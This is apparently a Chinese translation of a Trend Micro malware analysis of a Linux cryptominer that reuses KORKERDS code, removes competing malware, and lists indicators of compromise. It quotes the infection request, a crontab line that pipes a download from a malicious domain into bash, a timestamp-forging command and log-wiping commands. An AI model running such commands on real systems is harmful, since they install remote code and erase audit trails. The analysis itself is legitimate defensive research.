趨勢科技在執行日常記錄檔檢查時發現我們的誘捕網路偵測到一個會從某網域下載二進位檔案的腳本。經過進一步調查分析之後,我們發現該腳本會刪除一些已知的 Linux 惡意程式、挖礦程式以及一些連上某些挖礦服務的連線。除此之外,該腳本也讓人聯想到 Xbash 的功能和 KORKERDS 惡意程式。它會安裝一個挖礦惡意程式,也會將自己植入系統並在 crontab 當中設定排程以便在重新開機後繼續執行,並且防止遭到刪除。
圖 1:我們的誘捕網路偵測到一個會從某網域下載檔案的腳本。
行為分析
在發現這個會下載二進位檔案的腳本之後,我們也進一步查看了我們 2018 年 11 月所蒐集到的某個 KORKERDS 樣本的程式碼, 並發現兩者幾乎相同,除了少數明顯新增及刪除的部分之外。與 KORKERDS 相比,這個新發現的腳本並不會移除系統上已安裝的資安產品,也不會在系統上安裝 Rootkit。反而會將 KORKERDS 惡意挖礦程式和其 Rootkit 清除。基本上,這個新的腳本會刪除 KORKERDS 的惡意程式元件和挖礦執行程序。
圖 2:新的腳本抄襲自 KORKERDS 但卻會殺掉 KORKERDS 的「kworkerds」執行程序。
圖 3:新的腳本也會移除 KORKERDS 的 Rootkit 元件。
該腳本會下載一個修改過的 XMR-Stak 虛擬加密貨幣挖礦程式 (趨勢科技命名為 Coinminer.Linux.MALXMR.UWEIU) 以及一個通用 Stratum 礦池挖礦程式,可支援 CPU 及 AMD GPU 和 NVIDIA GPU 挖礦,專門開採 Cryptonight 演算法的貨幣。我們分析了一下感染案例發現,其最初是從某些 IP 攝影機和網站服務開始感染,駭客試圖經由 TCP 連接埠 8161 上傳一個 crontab 排程檔案:
| PUT /fileserver/vMROB4ZhfLTljleL HTTP/1.1Host: xxx.xxx.127.221:8161Accept: */*Content-Length: 105Content-Type: application/x-www-form-urlencoded*/10 * * * * root (curl -fsSL hxxp://yxarsh.shop/1.jpg||wget -q -O- hxxp://yxarsh.shop/1.jpg)|bash -sh## |
接著,這個 crontab 會讓系統下載並執行指令列腳本「1.jpg」,並啟用三項駭客所需的功能:
- 功能 B 會刪除先前系統上已安裝的惡意程式、挖礦程式以及另一個搭配的惡意程式 (趨勢科技命名為 SH.MALXMR.UWEIU) 所用到的相關服務。此外,也會建立新的目錄、檔案,並終止所有連上其 IP 位址的執行程序。
圖 4:挖礦程式腳本會刪除系統上先前安裝的惡意程式、挖礦程式與相關服務。
- 功能 D 會從「hxxp://yxarsh.shop/64」下載挖礦程式並加以執行。
- 功能 C 會從「hxxp://yxarsh.shop/0」下載一個腳本,並儲存成「/usr/local/bin/dns」檔案,然後建立一個新的 crontab 排程工作在凌晨 1 點時呼叫這個腳本。此外也會下載「hxxp://yxarsh.shop/1.jpg 」檔案並將它放入不同的 crontab 當中:
| /etc/cron.d/root/var/spool/cron/root/etc/cron.d/apache/var/spool/cron/crontabs/root/etc/cron.hourly/oanacroner/etc/cron.daily/oanacroner/etc/cron.monthly/oanacroner |
這些新的檔案時間戳記已經過修改,使其上次存取時間與「/bin/sh」檔案相同。
| touch -acmr /bin/sh /etc/cron.hourly/oanacroner |
接著惡意程式將自己植入系統內以便能在重新開機後繼續執行並防止遭到刪除,此外也將一些記錄檔內容清除為 0:
| echo 0>/var/spool/mail/rootecho 0>/var/log/wtmpecho 0>/var/log/secureecho 0>/var/log/cron |
相較於 KORKERDS 樣本,新的腳本將感染程序簡化成下載並執行檔案,接著將挖礦程式安裝至系統。若仔細分析其自我散布程式碼可發現大部分都抄襲自 KORKERDS 腳本,而該腳本 ( Base64 編碼) 目前還可從「hxxps://pastebin.com/u/SYSTEAM」下載。我們留意到「PUT URL /fileserver/vMROB4ZhfLTljleL」這道指令與實際的 crontab 之間缺乏連結。KORKERDS 的作法是直接儲存 crontab,而新的腳本卻是只建立一個 crontab 來下載所有的程式碼和挖礦程式。
圖 5:該腳本自我的散布程式碼抄襲自 KORKERDS 的 Python 腳本。
結論
雖然,這並非第一個會清除系統上其他惡意程式的惡意程式,但我們卻從未見過如此大量清除 Linux 惡意程式的案例。清除其他競爭對手的惡意程式,只是網路犯罪集團提高其獲利的手段之一。企業只要確保其系統皆隨時安裝廠商最新的修補更新,就能防範各種不斷演進的攻擊。不論是使用 CPU 或 GPU 資源的虛擬加密貨幣挖礦惡意程式,都會讓系統變慢。IT 系統管理員可採用多層式防護來即時偵測、防範、解決可能感染的惡意程式,如挖礦程式。此外,還能防止惡意程式影響網路與企業日常營運。
趨勢科技解決方案
入侵指標資料
| SHA256 雜湊碼 | 偵測名稱 |
| 2f7ff54b631dd0af3a3d44f9f916dbde5b30cdbd2ad2a5a049bc8f2d38ae2ab6 | Trojan.SH.MALXMR.UWEIU |
| d9390bbbc6e399a388ac6ed601db4406eeb708f3893a40f88346ee002398955c | Coinminer.Linux.MALXMR.UWEIU |
網址
drnfbu.xyz:26750
hxxp://yxarsh.shop
hxxp://yxarsh.shop/0
hxxp://yxarsh.shop/1.jpg
hxxp://yxarsh.shop/64
hxxp://yxarsh.shop/86
hxxps://pastebin.com/u/SYSTEAM
目錄
/opt/yilu/work/xig
/opt/yilu/work/xige
/usr/bin/bsd-port
檔案 (可修改旗標):
/opt/yilu/mservice
/opt/yilu/work/xig/xig
/opt/yilu/work/xige/xige
/tmp/thisxxs
/usr/bin/.sshd
/usr/bin/bsd-port/getty
/usr/local/bin/dns
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner
遭刪除的檔案 (檔案內容清除為 0):
/var/spool/mail/root
/var/log/wtmp
/var/log/secure
/var/log/cron
原文出處:Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners 作者:Augusto Remillano II 與 Jakub Urbanec